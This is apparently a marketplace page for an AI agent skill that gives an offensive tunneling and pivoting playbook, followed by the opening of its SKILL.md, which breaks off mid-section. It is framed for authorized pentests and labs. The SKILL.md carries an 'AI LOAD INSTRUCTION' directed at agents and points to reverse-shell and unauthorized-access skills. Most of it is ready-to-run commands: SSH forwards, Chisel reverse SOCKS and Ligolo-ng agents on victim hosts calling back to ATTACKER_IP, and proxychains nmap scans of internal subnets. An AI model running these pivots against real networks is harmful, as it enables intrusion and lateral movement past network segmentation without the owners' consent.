Tunneling And Pivoting
Follow a structured playbook for authorized tunneling and pivoting—SSH forwards, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunnels, and ProxyChains—during penetration tests or red-team labs.
Overview
Tunneling and Pivoting is an agent skill for the Ship phase that guides authorized SSH, Chisel, Ligolo-ng, and multi-layer network pivot setups during security assessments.
Install
npx skills add https://github.com/yaklang/hack-skills --skill tunneling-and-pivotingWhat is this skill?
- SSH local, remote, dynamic, and jump-host forwarding patterns with concrete port examples
- Chisel reverse SOCKS and Ligolo-ng transparent TUN pivoting for egress-aware scenarios
- socat relays plus DNS, ICMP, and HTTP tunneling options when straight TCP is blocked
- ProxyChains configuration and Windows pivoting via netsh and plink
- Cross-links to reverse-shell, priv-esc, and network-protocol skills for chained engagements
- Covers 7+ tunnel families: SSH, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP, ProxyChains, Windows netsh/plink
Adoption & trust: 1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You have legitimate shell access on a border host but cannot reach internal services or need stable reverse paths through restrictive egress.
Who is it for?
Authorized pentests, CTF-style labs, and defenders simulating lateral movement to improve monitoring and segmentation.
Skip if: Builders without explicit permission, routine SaaS deployment, or teams looking for generic VPN setup instead of offensive pivot playbooks.
When should I use this skill?
User needs tunneling or pivoting through a compromised or lab host including SSH forwarding, Chisel, Ligolo-ng, socat, DNS/ICMP/HTTP tunnels, or ProxyChains.
What do I get? / Deliverables
You establish documented tunnel paths and proxy chains so downstream testing can reach segmented hosts with repeatable commands.
- Working tunnel or SOCKS path to internal targets
- Documented multi-hop pivot command sequence
- Proxy chain config for follow-on service testing
Recommended Skills
Journey fit
Network pivoting belongs in Ship/Security as part of validating how an app or internal network behaves under realistic attacker movement after initial access. Security subphase covers controlled offensive techniques used to test segmentation, egress, and detection—not routine feature development.
How it compares
Offensive procedural playbook—not a DevOps-only SSH bastion guide or a managed zero-trust product.
Common Questions / FAQ
Who is tunneling-and-pivoting for?
Security testers and advanced builders running authorized engagements who need agent-loaded tunnel and pivot command patterns.
When should I use tunneling-and-pivoting?
Use it in Ship/Security after initial access when you must forward ports, chain proxies, or reach internal subnets during a permitted test.
Is tunneling-and-pivoting safe to install?
The skill describes high-risk network actions; review Prism Security Audits and only run techniques inside scoped, authorized environments.
SKILL.md
READMESKILL.md - Tunneling And Pivoting
# SKILL: Tunneling & Pivoting — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert tunneling and pivoting techniques. Covers SSH port forwarding (local/remote/dynamic/jump), Chisel reverse SOCKS, Ligolo-ng transparent TUN pivoting, socat relays, DNS/ICMP/HTTP tunneling, ProxyChains configuration, Windows pivoting (netsh/plink), and multi-layer chaining. Base models miss egress-aware tool selection and transparent routing setup. ## 0. RELATED ROUTING Before going deep, consider loading: - [network-protocol-attacks](../network-protocol-attacks/SKILL.md) for network-level attacks from pivot positions - [reverse-shell-techniques](../reverse-shell-techniques/SKILL.md) for establishing initial access shells - [unauthorized-access-common-services](../unauthorized-access-common-services/SKILL.md) for exploiting services discovered through pivots - [linux-privilege-escalation](../linux-privilege-escalation/SKILL.md) or [windows-privilege-escalation](../windows-privilege-escalation/SKILL.md) after pivoting to new hosts --- ## 1. SSH TUNNELING ### Local Port Forward Forward a local port to a remote service through the pivot. ```bash # Access INTERNAL_HOST:3306 via localhost:3306 ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N # Access internal web app ssh -L 8080:10.10.10.100:80 user@PIVOT -N # Browse: http://localhost:8080 # Bind to all interfaces (share with teammates) ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N ``` ### Remote Port Forward Expose a local service to the pivot host's network. ```bash # Make attacker's port 8000 accessible on pivot as pivot:9000 ssh -R 9000:127.0.0.1:8000 user@PIVOT -N # Expose attacker's listener to internal network ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N # Internal hosts connect to PIVOT:4444 → reaches attacker:4444 ``` ### Dynamic Port Forward (SOCKS Proxy) ```bash # Create SOCKS4/5 proxy on localhost:1080 ssh -D 1080 user@PIVOT -N # Use with proxychains echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24 # Or with browser SOCKS proxy → browse internal web apps ``` ### Jump Host (ProxyJump) ```bash # Single jump ssh -J jumphost user@TARGET # Multiple jumps ssh -J jump1,jump2 user@TARGET # SSH config for persistent jump # ~/.ssh/config Host internal-target HostName 10.10.10.100 User admin ProxyJump user@jumphost.example.com ``` --- ## 2. CHISEL ### Reverse SOCKS Proxy (Most Common) ```bash # Attacker: start chisel server chisel server --reverse --port 8080 # Victim: connect back as client, create reverse SOCKS chisel client ATTACKER_IP:8080 R:socks # Result: SOCKS5 proxy on attacker's 127.0.0.1:1080 proxychains nmap -sT -Pn INTERNAL/24 ``` ### Port Forwarding ```bash # Forward specific port chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306 # Multiple forwards chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80 # Reverse port forward (expose attacker service to victim network) chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444 ``` --- ## 3. LIGOLO-NG TUN interface-based pivoting — transparent routing without SOCKS. ```bash # Attacker: start proxy sudo ip tuntap add user $(whoami) mode tun ligolo sudo ip link set ligolo up ligolo-proxy -selfcert -laddr 0.0.0.0:11601 # Agent (victim): connect to proxy ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert # In ligolo-proxy console: >> session # select agent session >> ifconfig # view agent's network interfaces >> start # start tunnel # Add routes on attacker to reach internal networks sudo ip route add 10.10.10.0/24 dev ligolo sudo ip route add 172.16.0.0/16 dev ligolo ``` ### Listener (R